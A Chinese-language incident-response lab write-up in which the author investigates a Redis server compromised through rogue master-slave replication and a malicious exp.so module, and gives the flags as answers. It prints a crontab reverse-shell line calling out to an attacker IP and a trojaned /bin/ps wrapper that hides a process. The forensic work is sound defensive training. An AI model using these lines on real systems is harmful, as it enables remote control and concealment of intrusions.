第二章日志分析-redis应急响应-玄机靶场

  |  

redis应急响应-靶场笔记

题目汇总

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;

通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少

分析/var/log/redis.log日志,发现链接上 192.168.100.20 后黑客进行了主从复制操作(MASTER <-> REPLICA同步)。并上传加载了恶意模块“exp.so”

1
2
3
4
5
6
419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39

所以得到flag{192.168.100.20}

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件

由一题的思路我们可以得知黑客第一次上传的恶意文件就是“exp.so”

strings /exp.so | grep "flag"读取得到flag

1
2
3
4
root@ip-10-0-10-2:~# strings  /exp.so | grep "flag"
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
_flags2
_flags

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少

在分析/var/log/redis.log日志,发现一段奇怪的链接。

1
2
3
4
5
6
7
8
9
10
11
12
Jul 2023 05:33:50.693 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:53.698 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:53.698 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:53.699 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:54.700 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:54.700 * MASTER <-> REPLICA sync started

分析下了疑似攻击者想反弹链接192.168.100.13:8888,推断192.168.100.13为攻击者IP。

同时在crontab -l中发现反弹shell,目的IP同样为192.168.100.13

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@ip-10-0-10-2:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
*/1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h dom mon dow command
root@ip-10-0-10-2:~#

通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串

检查ssh密钥时发现疑似用户名:xj-test-user

1
2
3
4
5
6
root@ip-10-0-10-2:~# cat  .ssh/authorized_keys 
REDIS0009� redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

在github查询发现xj-test-user有个与项目相关的项目。

image-20240707201505043

寻找发现项目本身没有flag,一番查找后发现历史记录

image-20240707202518159

发现在typ提交下,网址:https://github.com/xj-test-user/redis-rogue-getshell/commit/76b1b74b92f9cc6ef2a62985debdf09dcc056636,发现在文件中内置:wow-you-find-flag flag{xj-test-user-wow-you-find-flag}

image-20240707202438539

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;

ls -alt /bin/ 查看最近变动的命令。

1
2
3
4
5
6
7
8
root@ip-10-0-10-2:~# ls -alt /bin/
total 197540
drwxr-xr-x 2 root root 36864 Aug 1 2023 .
-rwxrwxrwx 1 root root 178 Jul 31 2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31 2023 ps_
lrwxrwxrwx 1 root root 25 Jul 31 2023 aclocal -> /etc/alternatives/aclocal
lrwxrwxrwx 1 root root 26 Jul 31 2023 automake -> /etc/alternatives/automake
lrwxrwxrwx 1 root root 21 Jul 31 2023 c99 -> /etc/alternatives/c99

发现ps 大小和时间很可疑,读取发现flag

1
2
3
4
5
6
7
8
9
10
11
12

root@ip-10-0-10-2:~# cat /bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
文章目录
  1. 题目汇总
  2. 通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少
  3. 通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件
  4. 通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少
  5. 通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串
  6. 通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;
|